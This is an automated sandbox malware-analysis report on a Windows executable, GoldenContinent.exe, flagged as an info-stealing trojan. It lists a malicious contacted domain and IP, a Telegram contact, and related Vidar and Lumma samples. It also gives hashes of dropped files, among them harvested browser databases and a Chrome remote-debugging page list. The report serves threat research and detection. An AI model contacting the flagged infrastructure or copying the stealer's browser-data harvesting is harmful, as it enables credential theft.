                                                                                                                                                                                                        https://ogs.google.com/widget/app/so?eom=1chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210009540.0000781003564000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://anglebug.com/7760chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgRelationship.com, 0000000A.00000002.2593745021.0000000001960000.00000004.00000020.00020000.00000000.sdmp, EC2N7Y.10.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoRelationship.com, 0000000A.00000002.2593745021.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 68QI5P.10.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://anglebug.com/5901chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://anglebug.com/3965chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
IP               Domain          Country         ASN      ASN Name      Malicious
239.255.255.250  unknown         Reserved        unknown  unknown       false
142.250.181.68   www.google.com  United States   15169    GOOGLEUS      false
94.130.188.57    toptek.sbs      Germany         24940    HETZNER-ASDE  true
149.154.167.99   t.me            United Kingdom  62041    TELEGRAMRU    false
IP
192.168.2.4
127.0.0.1
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1579534
Start date and time:2024-12-22 22:46:05 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 55s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:22
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:GoldenContinent.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@43/39@5/6
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 81
• Number of non-executed functions: 294
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 217.20.58.100, 192.229.221.95, 172.217.21.35, 64.233.161.84, 172.217.19.238, 172.217.17.46, 20.109.210.53, 23.218.208.109, 13.107.246.63
• Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
16:46:56  API Interceptor  1x Sleep call for process: GoldenContinent.exe modified
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):294912
                                                                                                                                                                                                                                                                          Entropy (8bit):0.08436842005578409
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                                                                                                          MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                                                                                                          SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                                                                                                          SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                                                                                                                          SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):126976
                                                                                                                                                                                                                                                                          Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):9571
                                                                                                                                                                                                                                                                          Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                                                          Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):114688
                                                                                                                                                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1787
                                                                                                                                                                                                                                                                          Entropy (8bit):5.3719100122615275
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:SfNaoCVTECufNaoCn3my3mNCn3lfNaoCYIrdCYIDfNaoCnx0UrU0U8Ct:6NnCVTECWNnC35SC3RNnCYIrdCYI7Nnb
                                                                                                                                                                                                                                                                          MD5:C045960F621997ED342CDFC7EBEBDB11
                                                                                                                                                                                                                                                                          SHA1:36D5563049F9520BA88045F40924E303F7C4F69E
                                                                                                                                                                                                                                                                          SHA-256:BC70357E633E6F731139540558EB27EB7E521B92818885816D9745288B12DF57
                                                                                                                                                                                                                                                                          SHA-512:FB8DA457C7F1E4F86F4442C25EF5AA5121D2DE66D976D16E2C1F7EC263ACC37407B9134FC7C2EAACD2861239A04A23124704D63527CA80DA1EAC4701CB8789B0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/A687C6E07DD6320060B3070153ED1433",.. "id": "A687C6E07DD6320060B3070153ED1433",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/A687C6E07DD6320060B3070153ED1433"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/6E7F08B280D57AD159B18D95F162B2DF",.. "id": "6E7F08B280D57AD159B18D95F162B2DF",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/6E7F08B280D57AD159B18D95F162B2DF"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):947288
                                                                                                                                                                                                                                                                          Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                          MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                          SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                          SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                          SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: file.exe, Detection: malicious
• Filename: Full-Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: Full-Setup.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: Set-up.exe, Detection: malicious
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):291978
                                                                                                                                                                                                                                                                          Entropy (8bit):7.999288207292689
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:6144:6uNvO43f2hch0RgL/GXE2cIlOa9NYtxtLJoN6vO7iDbsn:53f2hmP/dK4mu1LJG+Qn
                                                                                                                                                                                                                                                                          MD5:F4EAEF20D7CB249C38BD71E18BEB5C75
                                                                                                                                                                                                                                                                          SHA1:D61CAC3B42D1EB9D6AAF2AC579FA7DFB1D8D5DF5
                                                                                                                                                                                                                                                                          SHA-256:128AAE5CA769C545558DE704B2DA34FF4B3A0F9A1C8637D108A4BC68235C3691
                                                                                                                                                                                                                                                                          SHA-512:D2ECE85D86B64FF9AE2BA3992621773FCC9069CE8B4855D6D75727D594587DD96DF64D307B5F77BA9382DBC4675729EB9330B60DB3ECC651F0A0DD9BD470673D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):99328
                                                                                                                                                                                                                                                                          Entropy (8bit):6.619834053469571
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:stCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtM:6COMVIPPL/sZ7HS3zcM
                                                                                                                                                                                                                                                                          MD5:041E0A2909F73D050592EE44B6206AEE
                                                                                                                                                                                                                                                                          SHA1:EEF9934E108CB1F535CE0931C38DA705F99F38D2
                                                                                                                                                                                                                                                                          SHA-256:40A2E1BB4E06F36BBE8E447A73337B0F1BEF79AAF290BDBD363A051F361EFE36
                                                                                                                                                                                                                                                                          SHA-512:CB2EF1260FC75B1CA77289F9E581A303D2D461B3886D2EC70AFBEF16B8CC1B6A6BA3EB009EDFC24DF1EACE7E2A59638CF381EEA5351F90ABDE68FCFAE2ED3A27
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1277
                                                                                                                                                                                                                                                                          Entropy (8bit):3.9221553212309654
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:xNyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1zgNu3NIhfnQARahmv6+VH4a1uq:ryGS9PvCA433C+sCNC1skNkvQfhSHQq
                                                                                                                                                                                                                                                                          MD5:E9FBB8FAC667C2932E012CE1462F1D67
                                                                                                                                                                                                                                                                          SHA1:2EA8BD2FEB443CEFB68B4EA8508FB1924666392B
                                                                                                                                                                                                                                                                          SHA-256:17029A8D3933139B442077A90799F7880770DCE3143B3F27DC6299E526A04AAF
                                                                                                                                                                                                                                                                          SHA-512:B5ACA0065B6C41A12B9D3B5A468C0AAE2AC743D9C0F9D65EFC04059E084B9A3F461356E4130FECA3D16EA854724986E97F66DBDFDFE5080B8F45EE809DBE9A16
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:OpenPGP Public Key Version 3, Created Sun Jul 12 11:54:22 2026, Unknown Algorithm (0xe6)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):21642
                                                                                                                                                                                                                                                                          Entropy (8bit):7.991498935142536
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:384:IS6J1mL5yYdUztZ/g1uOd3CKbp1/QS/D5S3q7x2iWyNbOzSrxKG9tL6O:IS6JULwztZnOkKlFQQ6q7UINbOzSrxK4
                                                                                                                                                                                                                                                                          MD5:4F7DC35D83ABA1DEBDF610F61D8354EB
                                                                                                                                                                                                                                                                          SHA1:E096C018E27A56DF92597717547F70AF75D0B37D
                                                                                                                                                                                                                                                                          SHA-256:C60FBE3C4A9ECA49B48022E6A2E7BA5D6AB52D70EE1366EFD34CCBA539604543
                                                                                                                                                                                                                                                                          SHA-512:FCF46720F70EB6AD76DE262790BA4590B10EF1CC62A010384A459EBE3511B59FEEFF2351CDE0B32718BA37FAE3BB13C4FFE51153BF345E36A3EDFD27909DA4DA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):67584
                                                                                                                                                                                                                                                                          Entropy (8bit):6.549914864408983
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:U1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzf:UZg5PXPeiR6MKkjGWoUlJUD
                                                                                                                                                                                                                                                                          MD5:7444BE6FDC34510517B96B373BCE699B
                                                                                                                                                                                                                                                                          SHA1:7F31A4DD2FF289CE6BE7BE3BA634AB918E3A4FB9
                                                                                                                                                                                                                                                                          SHA-256:EAE9EF63F97F313E74B78FA687DAD66D00DF8C8EE3663E5D093727BF92C35E47
                                                                                                                                                                                                                                                                          SHA-512:08BA0324ADFA33C8D547BB0E8D6F107EE331C0F5FDEA67F4A1CF70C0324298429F3D2FBF88D2B0361C6B11134BFAF6E84924F3167A63A8ACF7B6D9420628B198
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):61440
                                                                                                                                                                                                                                                                          Entropy (8bit):7.99714993641924
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:VIKA6oUNewyKIL3GKHgFfWb6Fmqi/2E9jYUM:LoQtypHgFeqiDM
                                                                                                                                                                                                                                                                          MD5:203EAA7C046A7E5C616D72BB500E2525
                                                                                                                                                                                                                                                                          SHA1:F1B8E88E05E2562E148E0B085F01D99735751524
                                                                                                                                                                                                                                                                          SHA-256:5F5EE058B13874AF192318D6F69881B90AC6FEEE483B5D0F7055FD9546D1BA94
                                                                                                                                                                                                                                                                          SHA-512:19FACF262754AAFD90C5A042DE45BBDD4A5315F7DC58A08350D9ED39C83268EEF709A0F168C7215D2197AC358832B75451C4EF70FE73A29BC2638CA8442BAD47
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):68608
                                                                                                                                                                                                                                                                          Entropy (8bit):7.997396975796028
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:x4lXXDoPbyD0gPw3Zg4QzK2pJ+x6LpzfPz29ozw5ARgeX:6zoPbyQP3Zg4QzKq7b22GACeX
                                                                                                                                                                                                                                                                          MD5:8F4DECD2A4D2D05FFDDB7C403561F346
                                                                                                                                                                                                                                                                          SHA1:385CA964D82C77F9624C165C73503F1B7E412155
                                                                                                                                                                                                                                                                          SHA-256:391D54BEF0B972CF5B3BF134E6C29867A3D30D373679BF06459205DC93FEB385
                                                                                                                                                                                                                                                                          SHA-512:26F012C839A091523A1884619EF14BB32EFACFB0343810A2618F4DBD358083A574900A121C835874D812212A56618753C9AABEDF146EF222E455D51B0583D573
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):81920
                                                                                                                                                                                                                                                                          Entropy (8bit):6.577303594110941
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:mjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubb1/Dde6Yu:Qv18mLthfhnueoMmOqDoioO5bLezW9Fy
                                                                                                                                                                                                                                                                          MD5:850E2F7751488B7087A56A61AE9BEF77
                                                                                                                                                                                                                                                                          SHA1:A45E63501B937BD51456A9EF9E603408F6D118F9
                                                                                                                                                                                                                                                                          SHA-256:49C3959766700E0B397F4BB14244D9CC4FB507C8BB81B6CC0F26CDC2D86F1667
                                                                                                                                                                                                                                                                          SHA-512:DC1053C1EB545D9E44E4DC26444177A6E88DF242CD689B5A367E6F056B2BF8703C7C5FDCFE940AC815480E9BBFA5BD03B306143933BBC64176E015E1090E7B38
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):51042
                                                                                                                                                                                                                                                                          Entropy (8bit):6.930689497243187
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:J+9BGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:J+9BGmdATGODv7xvTphAiPChgZ2kOE6
                                                                                                                                                                                                                                                                          MD5:FD222D640240E593C8281B3215992584
                                                                                                                                                                                                                                                                          SHA1:859F45468121EF32E0140677AA29AD637013B92B
                                                                                                                                                                                                                                                                          SHA-256:E0F37347ED8B26155463BFCF98ABC04DDF1F582C33012EBA1DCA1BAECAAB122C
                                                                                                                                                                                                                                                                          SHA-512:396A8D613E14E75DD3E760980F039071F5BCD3FEF17E3868377A5581BC507F6C27DD438D5ADA3520C8B668D37E86DF74F16DFBA52ACAD68A0A758CAD9C1F2255
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:Targa image data - RLE 8 x 8 x 8 +8 +8 "\010"
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):152576
                                                                                                                                                                                                                                                                          Entropy (8bit):5.31114009413781
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:YKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo:e6whxjgarB/5elDWy4Z
                                                                                                                                                                                                                                                                          MD5:2750CEAB03BDA7EC977660E2E5ED1378
                                                                                                                                                                                                                                                                          SHA1:F28A4057F2580AF4C97ECC4E4FCFDCE9D86918DB
                                                                                                                                                                                                                                                                          SHA-256:0226268D6FE7BBF21B21C2A3A117D26F949526F68FAA425D1D03B6689436EE43
                                                                                                                                                                                                                                                                          SHA-512:782722385D5ECA881C366DF968126D6B49601B470E9AB2A3F762053B7910520E8982DFEDECC98F764E8F9F10F8E45B5B542B11D9F6477949EF97DF2449BE5DC3
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1428), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):30129
                                                                                                                                                                                                                                                                          Entropy (8bit):5.0912603741502345
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:PyCCN7AUkSj4PAO0qvRm4sJtubk8l9wTNnUrKJLwioJhG:zFAOxvN0tw9l9wThUOJLwioJg
                                                                                                                                                                                                                                                                          MD5:AF14F57478CFDFECF403381BD9E816D0
                                                                                                                                                                                                                                                                          SHA1:652001844758EF461A0FAC5A1BA9097B0291D473
                                                                                                                                                                                                                                                                          SHA-256:F18F8E672DC1F8EBBEE1294CC79CEEA9C03C90E39101868CACFCC6B2648610BC
                                                                                                                                                                                                                                                                          SHA-512:B0879B3B25B2B75EA31438B1C9FECD2972D4F39E6B90CB8C3338EA395DB54F01D9DB7B4FB1B57FFD230A8F9A1562F057679DB2927CEE90BB8D6E0087B9DE7375
                                                                                                                                                                                                                                                                          Malicious:false
